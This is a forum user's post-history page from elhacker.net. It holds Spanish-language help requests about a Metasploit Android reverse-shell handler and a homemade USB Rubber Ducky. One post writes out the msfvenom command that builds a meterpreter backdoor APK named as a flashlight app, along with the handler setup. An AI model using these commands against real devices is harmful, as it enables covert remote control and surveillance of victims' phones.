elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Estamos en la red social de Mastodon


  Mostrar Mensajes
Páginas: [1]
1  Seguridad Informática / Bugs y Exploits / error en payload android/meterpreter/reverse_tcp en: 6 Diciembre 2017, 18:36 pm

Hola. Alguien que por favor me ayude. He seguido el procedimiento con todos los comandos. Estoy atacando mi android y no he podido.
He creado el apk, lo he instalado en mi android y nada
Luego de crearlo; abro la consola de metasploit, seteo el puerto, la ip y el payload android/meterpreter,  pero cuando voy a revisar como está todo con el comando "show options" no me aparece el "autoload android" sino que me aparecen líneas.
Debiera salirme así


Name                     current settings           Required           Description
--------                  -------------------          ----------           --------------
autoloadAndroid     true                             yes                   Automatically load the....
LHOST                   my ip                          yes                    the listen adress
LPORT                   7000                            YES                  the listen port


por favor alguien que me diga qué es lo que pasa. Ejecuto la aplicacion; la instalo, y nada


2  Sistemas Operativos / GNU/Linux / android/meterpreter/reverse_tcp error por favor ayuda en: 24 Agosto 2017, 02:08 am
Hola a todos. Tengo un problema con la metasploit en Ubuntu 16.4. He intentado un millón de veces hacer correr el backdoor del payload android/meterpreter/reverse_tcp pero no he podido
Hago todo bien, por describlires, los códigos que uso son los siguientes:
msfvenom -p android/meterpreter/reverse_tcp lhost=myip lport=7777 R > home/sebastian/Desktop/linterna.apk

Luego inicio metasploit
msfconsole

luego:
use exploit/multi/handler

luego
set payload android/meterpreter/reverse_tcp
set lhost myip
set lport 7777
 
cuando voy a verificar si todo está bien con el comando show optios  me sale lo siguiente:



   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST          myip             yes         The listen address
   LPORT          7777             yes         The listen port

En vez de esto, debería aparecerme:

   Name                     Current Setting  Required  Description
   AutoLoadAndroid           true                yes       Automatically Load the Android extension
   LHOST                          myip               yes       The listen address
   LPORT                          7777               yes       The listen port



No sé cual es el problema. Por favor ayúdenme.
3  Seguridad Informática / Hacking / Re: Como crear USB Rubber Ducky 'Casero' en: 23 Mayo 2017, 16:54 pm
he hecho todas las descargar, aun no encuentro una usb con ese driver, pero mi problema es que no encuentro la mencionada carpeta raíz "fw"
Por favor, si alguien me puede ayudar les agradezco
Muy buen tutorial, gracias por la información.
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines